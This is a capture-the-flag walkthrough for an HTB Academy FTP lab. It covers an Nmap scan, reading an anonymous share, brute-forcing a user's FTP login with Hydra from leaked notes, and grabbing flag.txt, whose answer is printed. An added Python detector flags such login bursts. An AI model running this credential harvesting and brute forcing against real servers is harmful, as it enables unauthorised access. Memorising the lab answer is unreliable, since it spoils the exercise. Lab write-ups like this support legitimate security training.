Attacking Common Services - Medium

ℹ️ Information

Question

Assess the target server and find the flag.txt file. Submit the contents of this file as your answer.

📋 Walkthrough

To start, we perform an Nmap scan to identify open ports and services on the target server.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ nmap -p- --min-rate=10000 $target
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 20:53 UTC
Nmap scan report for inlanefreight.htb (10.129.33.65)
Host is up (0.024s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
110/tcp   open  pop3
995/tcp   open  pop3s
2121/tcp  open  ccproxy-ftp
30021/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

Next, we perform a more detailed Nmap scan to gather information about the versions of the services running on the open ports.

Nmap scan report for inlanefreight.htb (10.129.33.65)
Host is up (0.026s latency).

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
|   256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_  256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
53/tcp    open  domain   ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: STLS CAPA UIDL USER TOP RESP-CODES AUTH-RESP-CODE SASL(PLAIN) PIPELINING
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-04-11T16:38:55
|_Not valid after:  2032-04-08T16:38:55
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-04-11T16:38:55
|_Not valid after:  2032-04-08T16:38:55
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: PIPELINING TOP USER CAPA UIDL AUTH-RESP-CODE SASL(PLAIN) RESP-CODES
2121/tcp  open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (InlaneFTP) [10.129.33.65]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
30021/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Internal FTP) [10.129.33.65]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.44 seconds

We attempt to log in to the FTP services on ports 2121 and 30021 using anonymous credentials. The login on port 2121 fails, but the login on port 30021 succeeds.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp $target 2121 
Connected to 10.129.33.65.
220 ProFTPD Server (InlaneFTP) [10.129.33.65]
Name (10.129.33.65:kali): anonymous
331 Password required for anonymous
Password: 
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp $target 30021
Connected to 10.129.33.65.
220 ProFTPD Server (Internal FTP) [10.129.33.65]
Name (10.129.33.65:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Apr 18  2022 simon
226 Transfer complete
ftp> cd simon
250 CWD command successful
ftp> ls -la
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4096 Apr 18  2022 .
drwxrwxr-x   3 ftp      ftp          4096 Apr 18  2022 ..
-rw-rw-r--   1 ftp      ftp           153 Apr 18  2022 mynotes.txt
226 Transfer complete
ftp> get mynotes.txt
local: mynotes.txt remote: mynotes.txt
200 EPRT command successful
150 Opening BINARY mode data connection for mynotes.txt (153 bytes)
100% |***************************************************************************************************************|   153       81.95 KiB/s    00:00 ETA
226 Transfer complete
153 bytes received in 00:00 (5.23 KiB/s)
ftp> 

We find a file named mynotes.txt in the simon directory, which contains potential passwords.

Notes:
234987123948729384293
+23358093845098
ThatsMyBigDog
Rock!ng#May
Puuuuuh7823328
8Ns8j1b!23hs4921smHzwn
237oHs71ohls18H127!!9skaP
238u1xjn1923nZGSb261Bs81

Using Hydra, we brute-force the FTP login on port 2121 with the username simon (suggested by the directory name on the anonymous share) and the passwords from mynotes.txt as the wordlist. Hydra finds the correct password.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l "simon" -P mynotes.txt ftp://$target:2121                   
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 21:01:50
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking ftp://10.129.33.65:2121/
[2121][ftp] host: 10.129.33.65   login: simon   password: 8Ns8j1b!23hs4921smHzwn
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-20 21:02:02
simon:8Ns8j1b!23hs4921smHzwn
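
Seen from the server side, the anonymous download on port 30021 and the Hydra run on port 2121 each leave a recognisable pattern in the FTP logs. The detection logic below is an added example, not part of the original walkthrough; the normalised key=value log format, the source address 192.0.2.10 and the thresholds are assumptions, and the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events in a normalised key=value format (an assumption, not
# ProFTPD's native log format); 192.0.2.10 is a documentation address.
SAMPLE_LOG = """\
2025-03-20T20:57:40 port=2121 src=192.0.2.10 user=anonymous event=LOGIN_FAIL
2025-03-20T20:58:10 port=30021 src=192.0.2.10 user=anonymous event=LOGIN_OK
2025-03-20T20:58:31 port=30021 src=192.0.2.10 user=anonymous event=RETR path=/simon/mynotes.txt
2025-03-20T21:01:51 port=2121 src=192.0.2.10 user=simon event=LOGIN_FAIL
2025-03-20T21:01:51 port=2121 src=192.0.2.10 user=simon event=LOGIN_FAIL
2025-03-20T21:01:52 port=2121 src=192.0.2.10 user=simon event=LOGIN_FAIL
2025-03-20T21:01:52 port=2121 src=192.0.2.10 user=simon event=LOGIN_FAIL
2025-03-20T21:01:53 port=2121 src=192.0.2.10 user=simon event=LOGIN_OK
2025-03-20T21:01:53 port=2121 src=192.0.2.10 user=simon event=LOGIN_FAIL
2025-03-20T21:01:54 port=2121 src=192.0.2.10 user=simon event=LOGIN_FAIL
2025-03-20T21:01:54 port=2121 src=192.0.2.10 user=simon event=LOGIN_FAIL
2025-03-20T21:03:20 port=2121 src=192.0.2.10 user=simon event=RETR path=/flag.txt
"""


def parse(line):
    """Split 'timestamp k=v k=v ...' into a dict with a datetime under 'ts'."""
    ts, *pairs = line.split()
    rec = dict(p.split("=", 1) for p in pairs)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec


def detect(log, window=timedelta(seconds=60), min_failures=3):
    """Return alerts for anonymous downloads and guessing bursts that succeed."""
    fails, oks, alerts = defaultdict(list), defaultdict(list), []
    for rec in map(parse, filter(None, log.splitlines())):
        key = (rec["src"], rec["port"], rec["user"])
        if rec["event"] == "LOGIN_FAIL":
            fails[key].append(rec["ts"])
        elif rec["event"] == "LOGIN_OK":
            oks[key].append(rec["ts"])
        elif rec["event"] == "RETR" and rec["user"] == "anonymous":
            alerts.append(("anonymous_download", rec["port"], rec["path"]))
    # Parallel guessing tools log attempts out of order, so count failures on
    # either side of each success rather than only the ones before it.
    for (src, port, user), times in oks.items():
        for ok in times:
            near = sum(1 for t in fails[(src, port, user)] if abs(ok - t) <= window)
            if near >= min_failures:
                alerts.append(("guess_then_success", port, f"{user} after {near} failures"))
    return alerts
```

The single failed anonymous login on port 2121 stays below the threshold and raises nothing; only the burst against simon that ends in a success does.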

We then connect to the FTP service on port 2121 using the valid credentials and retrieve the flag.txt file.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp $target 2121 
Connected to 10.129.33.65.
220 ProFTPD Server (InlaneFTP) [10.129.33.65]
Name (10.129.33.65:kali): simon
331 Password required for simon
Password: 
230 User simon logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||20735|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 root     root           29 Apr 20  2022 flag.txt
drwxrwxr-x   3 simon    simon        4096 Apr 18  2022 Maildir
226 Transfer complete
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||35024|)
150 Opening BINARY mode data connection for flag.txt (29 bytes)
    29       13.86 KiB/s 
226 Transfer complete
29 bytes received in 00:00 (0.95 KiB/s)
ftp> 

Finally, we read the contents of the flag.txt file to find the flag.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ cat flag.txt   
HTB{1qay2wsx3EDC4rfv_M3D1UM}

Answer

HTB{1qay2wsx3EDC4rfv_M3D1UM}